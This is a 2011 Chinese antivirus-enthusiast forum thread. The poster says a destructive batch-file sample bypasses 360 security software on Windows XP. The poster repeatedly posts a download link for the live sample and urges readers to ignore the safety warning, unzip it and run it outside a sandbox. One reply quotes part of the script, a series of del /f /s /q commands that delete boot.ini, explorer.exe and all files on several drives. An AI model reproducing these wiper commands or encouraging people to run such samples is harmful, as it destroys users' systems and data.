批处理过【360主防】重大漏洞

显示全部楼层 · 发表于 2011-5-19 09:58:28

本帖最后由 695580825 于 2011-5-19 12:01 编辑

系统：XP SP3（该样本只在XP下有效）

安全软件：360安全卫士（最新病毒库最新测试版）360杀毒（最新病毒库最新尝鲜版）

【样本地址】http://dl.dbank.com/c08i478eg2

这个样吧以前在一个论坛捕获的（当时几万人下载）中招的人不少。。。

【运行之后】会破坏格式系统核心文件，全盘删除所有EXE等执行文件

可以说是过全部当时我放在卡饭样本区

没有一个安全软件会拦截（除了HIPS会提示一下）也很模糊

曾经这个样本通杀所有安全软件（微点拦）

提示要格式化系统核心文件.....

【已经过去一年了】看看这个样本如何？【去年的样本了】09年就见过这个样本。。。。

在线扫描结果：（有不少杀了）当年没一款杀的

http://www.virustotal.com/file-scan/report.html?id=8abf5b4e9abcc48acaa2c7ee67a4286911d873bd28b1c7528611007da673afa7-1305769794

下载之后（网盾会提示不安全）不用管他，解压（解压之后360安全卫士还是360杀毒都提示安全）

运行之后360主防会提示一下（但仅仅只保护系统文件不被破坏）其他盘符所有EXE文件依然被删除

只有删除到QQ文件夹时（主防会提示一下修改QQ文件）。。。。

大家测试玩玩吧。
===============================================

以前也经常见到破坏的批处理过360防御，看来360真的应该加强这方面的防御了

http://bbs.kafan.cn/thread-974929-1-1.html

显示全部楼层 · 发表于 2011-5-19 10:00:22

又来了，早上来看个笑话

显示全部楼层 · 发表于 2011-5-19 10:03:15

Tron 发表于 2011-5-19 10:00
又来了，早上来看个笑话

【样本地址】http://dl.dbank.com/c08i478eg2

【截图】http://dl.dbank.com/c01x0dh5om

显示全部楼层 · 发表于 2011-5-19 10:08:43

695580825 发表于 2011-5-19 10:03
【样本地址】http://dl.dbank.com/c08i478eg2

【截图】http://dl.dbank.com/c01x0dh5om

奇怪，笑话带截图

显示全部楼层 · 发表于 2011-5-19 10:11:45

本帖最后由 695580825 于 2011-5-19 10:13 编辑

Tron 发表于 2011-5-19 10:08

奇怪，笑话带截图

哈哈，就是过了，口才又不好，还喜欢胡搅蛮缠

过了就是过了，不承认是没用的，赶快去完善吧，你这个态度会让产品完善进步吗？

嘿~这样是不利于产品的进步与发展的，你是“聪明人”你应该知道怎么做~O(∩_∩)O

大家测试吧（论坛今天有问题无法上图）截图已经发到http://dl.dbank.com/c01x0dh5om

样本地址 http://dl.dbank.com/c08i478eg2

下载之后（网盾会提示不安全）不用管他，解压（解压之后360安全卫士还是360杀毒都提示安全）

运行之后360主防会提示一下（但仅仅只保护系统文件不被破坏）其他盘符所有EXE文件依然被删除

只有删除到QQ文件夹时（主防会提示一下修改QQ文件）。。。。

大家测试玩玩吧。

显示全部楼层 · 发表于 2011-5-19 10:13:17

不过360沙箱对于这种无法判断的del *.*... 虽然本身就是个很无聊的拦截需求.
但你把这种东西放在沙箱里面运行成功了也无法对系统产生任何效果 ^_^.

样本内容: 删除所有文件...
@del /f /s /q /a s c:\boot.ini
@del /f /s /q /a s %systemroot%\explorer.exe
@del /f /s /q e:\*.*
@del /f /s /q d:\*.*
@del /f /s /q f:\*.*
@del /f /s /q z:\*.*
@del /f /s /q y:\*.*
@del /f /s.........

显示全部楼层 · 发表于 2011-5-19 10:13:24

路过,不解释...

显示全部楼层 · 发表于 2011-5-19 10:14:26

eraylee 发表于 2011-5-19 10:13
不过360沙箱对于这种无法判断的del *.*... 虽然本身就是个很无聊的拦截需求.
但你把这种东西放在沙箱里面 ...

请实机运行或（虚拟机）不要使用沙箱

请测主防

大家测试吧（论坛今天有问题无法上图）截图已经发到http://dl.dbank.com/c01x0dh5om

样本地址 http://dl.dbank.com/c08i478eg2

下载之后（网盾会提示不安全）不用管他，解压（解压之后360安全卫士还是360杀毒都提示安全）

运行之后360主防会提示一下（但仅仅只保护系统文件不被破坏）其他盘符所有EXE文件依然被删除

只有删除到QQ文件夹时（主防会提示一下修改QQ文件）。。。。

大家测试玩玩吧。

显示全部楼层 · 发表于 2011-5-19 10:15:01

系统：XP SP3（该样本只在XP下有效）

安全软件：360安全卫士（最新病毒库最新测试版）360杀毒（最新病毒库最新尝鲜版）

显示全部楼层 · 发表于 2011-5-19 10:16:21

本帖最后由 695580825 于 2011-5-19 10:17 编辑

很老的样本，当年通杀，也只有微点提示会格式化删除系统核心文件

并完美阻止

但运行之后360主防会提示一下（但仅仅只保护系统文件不被破坏）其他盘符所有EXE文件依然被删除

只有删除到QQ文件夹时（主防会提示一下修改QQ文件）。。。。

[讨论] 批处理过【360主防】重大漏洞

评分